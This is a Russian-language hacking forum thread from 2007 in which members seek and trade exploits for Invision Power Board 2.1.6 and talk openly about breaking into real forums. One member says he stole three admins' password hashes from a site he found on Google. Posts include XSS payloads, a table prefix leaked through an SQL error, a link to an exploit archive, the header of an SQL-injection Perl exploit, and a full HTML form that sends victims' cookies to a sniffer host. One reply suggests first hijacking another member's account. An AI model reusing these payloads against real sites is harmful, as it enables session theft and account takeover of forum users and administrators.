Сплойт свежий для IPB 2.1.6
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Сплойт свежий для IPB 2.1.6 - 2007-07-10 23:51:40.220000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
вопрос тупой, согласен, кто же такое бесплатно скажет, но все-таки, хотя бы намекните, где искать? Плз[sm=aj.gif]
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 00:18:05.986666
|
|
|
ViD0K
Сообщений: 134
Оценки: 0
Присоединился: 2007-07-10 19:57:57.680000
|
Попробуй здесь и здесь
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 00:20:30.486666
|
|
|
ViD0K
Сообщений: 134
Оценки: 0
Присоединился: 2007-07-10 19:57:57.680000
|
А так тебе google в руки!;)
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 01:12:47.800000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Неа, пишет Forum unvulnerable на все сплойты. Но почему-то типо тырит хэш по ID. Бред какой-то Причом хэш какой-то левый - сравнивал со своим, т.к. предварителльно зарегился
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 10:30:46.220000
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Если будет работать то скажишь !!!:) Ок ???
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 10:56:56.810000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Снифануть чтоли? Это я не умею. Мне бы сплойтик какойнить на перле, а то те что в паблике уже все пропатчены
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 11:15:49.593333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
О, нашел. http://server/forum/admin.php?phpinfo=<script>alert()</script> Только теперь можно и не дождаца админа, а так работаит
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 15:13:36.303333
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Pashkela спасиб те !!! ОГРОМНОЕ !!!
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 15:20:25.340000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Skull_roman Pashkela спасиб те !!! ОГРОМНОЕ !!! Чо помогло штоли?:) Колись, милай, колись
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 15:26:37.790000
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Надо сесси админа [:(] А так все оК ! не я щас наверно буду писать свой эксплоит под…
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 16:00:48.916666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Если напишешь - сорцы в студию! Ну или в личку мяукни
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 12:22:21.546666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Короче задался я целью найти форум не пропатченый от RST. Сел в гугл, забил "IPB форум" и где-то на 10 страничке нашел бажный. Похекал его, поимел хеши и соли 3-х админов, пропассвордипро - хрен, пароль не только из цифр. Ладно, полез в оперу, зарегился тама, меняю в кукисах ID на админский, хеш соответственно тоже. Закрываю Оперу, открываю Оперу, F5 - так ведь по идее должен зайти как Админ? А он в итоге обнуляет все и делает меня опять гостем. В общем вопрос - если таки есть легальные хеш, соль и ай-ди админа, что можно таки сделать? И что я делаю неправильно? У меня в голове только один вариант остался - ждать появления админа на сцайте и тырить сессию.
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 19:45:35.916666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Вот еще нарыл: запрос такой: /forum/index.php?act=Online&st=-1 Ответ сервера: mySQL query error: SELECT * FROM ibf_sessions s WHERE s.running_time > 1184253970 ORDER BY running_time desc LIMIT -1,25 SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1,25' at line 1 SQL error code: Date: 12.7.2007, 8:41 Таким образом узнал префикс. Как можно использовать эту ошибочку?
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 19:56:42.760000
|
|
|
Yujin Belford
Сообщений: 4
Оценки: 0
Присоединился: 2007-07-12 00:14:45.060000
|
мне тоже интересно узнать, что дальше с этим делать. p.s. сплойт работает на 2.1.7
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 21:12:39.960000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Нашел. Это: "Пассивная XSS" - это XSS нападение, которое может инициировать нападавший только сам для себя. Т.е. например он может послать снифферу только свои куки, что конечно же не является какой-либо угрозой для остальных лиц форума. Но тем не менее это один из "косяков" форума. Говоря другими словами, если форум пропускает XSS, это является его недоработкой. Симптомы: - Создайте новое личное сообщение - В поле заголовка письма укажите: Цитата "><sсriрt>alert(ipb_md5_check);</sсriрt> - В поле тела письма любой текст - Нажмите "Предпросмотр" В моем случае дырка закрыта. Хотя по идее можно снифануть отправив на предварительно созданную страничку. Блин, гемморой-то какой
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-17 20:36:30.456666
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
quote:
ORIGINAL: Pashkela Симптомы: - Создайте новое личное сообщение - В поле заголовка письма укажите: Цитата "><sсriрt>alert(ipb_md5_check);</sсriрt> - В поле тела письма любой текст - Нажмите "Предпросмотр" Некатит енто !!! не катит ! Я почти написал эксплоит :):D:):D
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-18 01:13:48.190000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Skull_roman quote:
ORIGINAL: Pashkela Симптомы: - Создайте новое личное сообщение - В поле заголовка письма укажите: Цитата "><sсriрt>alert(ipb_md5_check);</sсriрt> - В поле тела письма любой текст - Нажмите "Предпросмотр" Некатит енто !!! не катит ! Я почти написал эксплоит :):D:):D Хм. Ну тогда я почти стал единоличным владельцем интернета, майкрософта и еще кучи мелких компашек
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 14:16:07.530000
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Кому надо эксплоит ???? эксплоит написанный мною http://smolevichi.moy.su/Exploits/ipb.rar — ДЕРЖИТЕ ПОКА Я ДОБРЫЙ !!!!:D:)
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 14:29:00.726666
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Забыл сказать, он написан бод SQL инъекцию
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 18:10:10.193333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Skull_roman Забыл сказать, он написан бод SQL инъекцию Не работаит "твой" сплойт от RST
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 19:16:04.743333
|
|
|
sys64.dll
Сообщений: 40
Оценки: 0
Присоединился: 2007-07-15 18:34:58.500000
|
quote:
написанный мною quote:
#!/usr/bin/perl ## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC ## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41 ## http://rst.void.ru/papers/advisory41.txt ## tested on 2.1.3, 2.1.6 ## ## 08.06.06 ## ©oded by 1dt.w0lf ## RST/GHC ## http://rst.void.ru ## http://ghc.ru [sm=9.gif][sm=9.gif][sm=9.gif] ты бы хоть камменты удалил Pashkela milw0rm.com quote:
## 08.06.06 тем более он старый
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-22 20:20:42.476666
|
|
|
denispoc
Сообщений: 55
Оценки: 0
Присоединился: 2007-03-12 15:14:27.080000
|
quote:
ORIGINAL: Pashkela В моем случае дырка закрыта. Хотя по идее можно снифануть отправив на предварительно созданную страничку. Блин, гемморой-то какой <form action="http://твойфорумipb2.1.7иниже/index.php?act=msg" method="post" name="REPLIER""> <input type="hidden" name="removeattachid" value="0" /> <input type="hidden" name="OID" value="" /> <input type="hidden" name="act" value="Msg" /> <input type="hidden" name="CODE" value="04" /> <input type="hidden" name="MODE" value="01" /> <input type="hidden" name="preview" value="Предварительный просмотр"> <input type="hidden" name="msg_title" value='"><script language="JavaScript">aa1 = new Image(); aa1.src="'">http://сниффак.gif?"+document.cookie;</script>'> </form> ломаешь сначала какую-нидь девочку-старожилку, а потом от ее имени шлешь админу=)
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-23 01:59:22.870000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Это-то понятно, хотелось бы готовый .pl А вам слабо?:)
|
|
|
|
|